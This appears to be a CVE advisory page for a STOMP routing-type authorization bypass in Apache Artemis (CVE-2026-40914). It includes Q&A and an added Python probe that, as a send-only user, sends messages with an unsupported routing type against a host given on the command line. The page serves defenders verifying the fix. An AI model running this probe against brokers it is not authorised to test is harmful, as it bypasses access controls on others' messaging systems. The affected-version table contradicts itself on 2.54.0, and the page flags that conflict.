CVE-2026-40914
Privilege Escalation in Apache Artemis via STOMP Routing-Type Manipulation
Publication date: 2026-05-28
Last updated on: 2026-05-28
Assigner: Apache Software Foundation
Description
CVSS Scores
EPSS Scores
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| apache | artemis | 2.50.0 through 2.53.0 (inclusive) |
| apache | activemq_artemis | 2.0.0 through 2.44.0 (inclusive) |
| apache | artemis | 2.54.0 |
| apache | activemq_artemis | 2.54.0 |
The two 2.54.0 rows conflict with the remediation guidance further down this page, which names 2.54.0 as the release that fixes the issue; confirm the affected range against the vendor advisory before deciding whether a 2.54.0 deployment needs action.
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-863 | The product performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability exists in Apache Artemis when clients connect over the STOMP protocol. Every Artemis address carries one or more routing types (anycast for point-to-point delivery, multicast for publish/subscribe), and changing the routing types of an address is supposed to require the createAddress permission. Because the STOMP layer does not perform that authorization check correctly (CWE-863), a user who holds only send or consume permission on an address can nonetheless change its routing type, and can then send or receive messages using a routing type the address was never configured to support, which the broker should have blocked.
How can this vulnerability impact me?
A user with only send or consume rights can alter how messages are routed on an address without the authorization that change is supposed to require. In practice this means messages can be delivered in ways the administrator did not configure: an address set up for point-to-point (anycast) delivery can be addressed as publish/subscribe (multicast), or the reverse, so messages may reach consumers they were not intended for, access boundaries built around the configured routing can be bypassed, and the integrity of the messaging system is undermined.
What immediate steps should I take to mitigate this vulnerability?
Upgrade Apache Artemis or Apache ActiveMQ Artemis to version 2.54.0, which fixes the issue. Until the upgrade is done, treat every role that holds send or consume permission on a STOMP-reachable address as if it could change that address's routing types, and review those grants accordingly. After the upgrade, confirm the fix by having such a user attempt to send or subscribe with a routing type the address does not support and checking that the broker now refuses it.
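As an added check (written for this page, not code from the CVE entry or from the Apache Artemis project), the script below builds STOMP 1.2 frames by hand and runs the probe a practitioner would use to confirm the fix after upgrading: connect as a user who holds only send permission on an address and SEND with a routing type the address does not support. It assumes (check your Artemis version's STOMP documentation) that the routing type is selected with a `destination-type` header whose value is ANYCAST or MULTICAST, and that a refused frame is answered with a STOMP ERROR frame. The `FakeBroker` class, the address name `orders`, the credentials and the command-line shape are constructed so the script runs offline. On a patched broker the probe should report `refused`; `accepted` means the user was able to route with a type the address does not carry.

```python
"""STOMP 1.2 frame builder/parser plus a routing-type authorization probe.

Added example; not part of the CVE page or the Apache Artemis project.
Assumptions: Artemis selects the routing type via a `destination-type` header
(ANYCAST or MULTICAST) and answers a refused SEND with a STOMP ERROR frame.
"""
import socket

NUL = b"\x00"
# STOMP 1.2 header escaping; the spec exempts CONNECT/CONNECTED frames.
_ESC = {"\\": "\\\\", "\r": "\\r", "\n": "\\n", ":": "\\c"}
_UNESC = {v: k for k, v in _ESC.items()}


def _escape(value, command):
    if command in ("CONNECT", "CONNECTED"):
        return value
    return "".join(_ESC.get(ch, ch) for ch in value)


def _unescape(value, command):
    if command in ("CONNECT", "CONNECTED"):
        return value
    out, i = [], 0
    while i < len(value):
        if value[i] == "\\" and i + 1 < len(value):
            out.append(_UNESC[value[i:i + 2]])  # KeyError on an undefined escape
            i += 2
        else:
            out.append(value[i])
            i += 1
    return "".join(out)


def build_frame(command, headers, body=b""):
    """Serialise one frame: command, header lines, blank line, body, NUL."""
    lines = [command] + [f"{k}:{_escape(str(v), command)}" for k, v in headers.items()]
    return ("\n".join(lines) + "\n\n").encode() + body + NUL


def parse_frame(data):
    """Return (command, headers, body) for the first frame in `data`."""
    raw, _, _ = data.partition(NUL)
    head, _, body = raw.partition(b"\n\n")
    lines = head.decode().split("\n")
    command = lines[0]
    headers = {}
    for line in lines[1:]:
        k, _, v = line.partition(":")
        headers.setdefault(k, _unescape(v, command))  # first occurrence wins per spec
    return command, headers, body


def probe_frames(address, routing_type, login="user", passcode="pass"):
    """Frames a send-only user emits to push a message with an explicit routing type."""
    return [
        build_frame("CONNECT", {"accept-version": "1.2", "host": "localhost",
                                "login": login, "passcode": passcode}),
        build_frame("SEND", {"destination": address, "destination-type": routing_type,
                             "receipt": "probe-1"}, b"probe"),
    ]


def classify(response):
    """Map the broker's reply to the SEND into a verdict string."""
    command, headers, _ = parse_frame(response)
    if command == "ERROR":
        return "refused: " + headers.get("message", "")
    if command == "RECEIPT" and headers.get("receipt-id") == "probe-1":
        return "accepted"
    return "unexpected: " + command


def run_probe(conn, address, routing_type, login="user", passcode="pass"):
    """`conn` needs sendall()/recv(); returns the verdict for the SEND frame."""
    connect, send = probe_frames(address, routing_type, login, passcode)
    conn.sendall(connect)
    cmd, _, _ = parse_frame(conn.recv(4096))
    if cmd != "CONNECTED":
        return "login failed: " + cmd
    conn.sendall(send)
    return classify(conn.recv(4096))


class FakeBroker:
    """Constructed stand-in so the probe runs offline. refuse=True mimics a
    patched broker rejecting a routing type the address does not support."""

    def __init__(self, refuse):
        self.refuse, self._reply = refuse, b""

    def sendall(self, data):
        cmd, headers, _ = parse_frame(data)
        if cmd == "CONNECT":
            self._reply = build_frame("CONNECTED", {"version": "1.2"})
        elif cmd == "SEND" and self.refuse:
            self._reply = build_frame("ERROR", {"message": "routing type not permitted"})
        elif cmd == "SEND":
            self._reply = build_frame("RECEIPT", {"receipt-id": headers["receipt"]})

    def recv(self, n):
        reply, self._reply = self._reply, b""
        return reply


if __name__ == "__main__":
    import sys
    # Assumed CLI shape: probe.py HOST PORT ADDRESS ; otherwise run offline demo.
    if len(sys.argv) == 4:
        with socket.create_connection((sys.argv[1], int(sys.argv[2]))) as s:
            print(run_probe(s, sys.argv[3], "MULTICAST"))
    else:
        print(run_probe(FakeBroker(refuse=True), "orders", "MULTICAST"))
```

Run it against a test broker with a user that has send (and consume) but not createAddress on the target address, once with MULTICAST against an anycast-only address and once the other way round; the header escaping in `build_frame`/`parse_frame` matters because address names containing `:` or `\` would otherwise be mangled and the probe would test the wrong address.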